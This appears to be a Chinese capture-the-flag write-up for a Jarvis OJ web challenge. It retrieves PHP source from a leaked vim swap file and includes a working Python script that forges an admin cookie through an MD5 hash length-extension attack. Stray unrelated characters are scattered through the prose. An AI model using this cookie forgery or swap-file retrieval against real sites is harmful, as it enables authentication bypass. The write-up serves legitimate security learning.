這題真的學(xué)到超多收苏!
要點(diǎn):
- vim留下的臨時(shí)文件
- 反序列化忽略多余字符串
- HASH拓展攻擊
參考了以下題解及文章:
- http://www.reibang.com/p/5342d07a6956
- http://element-ui.cn/news_show_25227.shtml
- https://www.cnblogs.com/pcat/p/5478509.html
Notes:
MD5拓展攻擊時(shí),由于Salt不知道長(zhǎng)度,可以用爆破法求得長(zhǎng)度
Step1:
發(fā)現(xiàn)發(fā)送一次請(qǐng)求后被設(shè)置了Cookie
Cookie: role=s%3A5%3A%22guest%22%3B; hsh=3a4727d57463f122833d9e732f94e4e0
Decode之后為
Cookie: role=s:5:"guest";; hsh=3a4727d57463f122833d9e732f94e4e0
顯然衰琐,要把role改為admin,并且根據(jù)字符串格式可見(jiàn)是PHP序列化字符串藤抡,直接修改無(wú)效厉熟,推測(cè)要符合hsh值
束手無(wú)策,看了題解溉潭,下一步考察源碼泄露净响,可以用掃描器掃描也可以,這里是vim臨時(shí)文件導(dǎo)致的文件泄露
下載http://web.jarvisoj.com:32778/index.php~并且更名為.index.php.swp
輸入命令vi -r index.php成功恢復(fù)index.php文件喳瓣,獲取到源代碼
<!DOCTYPE html>
<html>
<head>
<title>Web 350</title>
<style type="text/css">
body {
background:gray;
text-align:center;
}
</style>
</head>
<body>
<?php
$auth = false;
$role = "guest";
$salt =
if (isset($_COOKIE["role"])) {
$role = unserialize($_COOKIE["role"]);
$hsh = $_COOKIE["hsh"];
if ($role==="admin" && $hsh === md5($salt.strrev($_COOKIE["role"]))) {
$auth = true;
} else {
$auth = false;
}
} else {
$s = serialize($role);
setcookie('role',$s);
$hsh = md5($salt.strrev($s));
setcookie('hsh',$hsh);
}
if ($auth) {
echo "<h3>Welcome Admin. Your flag is
} else {
echo "<h3>Only Admin can see the flag!!</h3>";
}
?>
</body>
</html>
要點(diǎn)代碼:
unserialize()會(huì)忽略多余的字符
md5($salt.strrev($_COOKIE["role"]))參數(shù)會(huì)反轉(zhuǎn)馋贤,所以和unserialize()結(jié)合只需要構(gòu)造
's:5:"admin"; +填充字符+s:5:"guest";'即可構(gòu)成Hash拓展攻擊
Hash拓展攻擊參見(jiàn):https://xz.aliyun.com/t/2563
由于不知道salt的長(zhǎng)度,所以寫(xiě)一個(gè)腳本爆破salt的長(zhǎng)度畏陕,我寫(xiě)的腳本貼在下方
import requests,urllib
from hashpumpy import hashpump
def attack():
url="http://web.jarvisoj.com:32778/"
hsh="3a4727d57463f122833d9e732f94e4e0"
guestS='s:5:"guest";'[::-1]
adminS='s:5:"admin";'[::-1]
i=0
html='Only'
newHsh=''
message=''
while ('Only' in html):
print("Tring Salt length:",i)
newHsh,message=hashpump(hsh,guestS,adminS,i)
message=message[::-1]
payload={"role":urllib.parse.quote(message),"hsh":newHsh}
html=requests.get(url,cookies=payload).text
i+=1
print("SaltLength:%d\nMessage:%s\nquotedMessage:%s\nHsh:%s\nHtml:\n%s\n"%(i,message,urllib.parse.quote(message),newHsh,html))
if __name__ == '__main__':
attack()
成功得到FlagPCTF{H45h_ext3ndeR_i5_easy_to_us3}
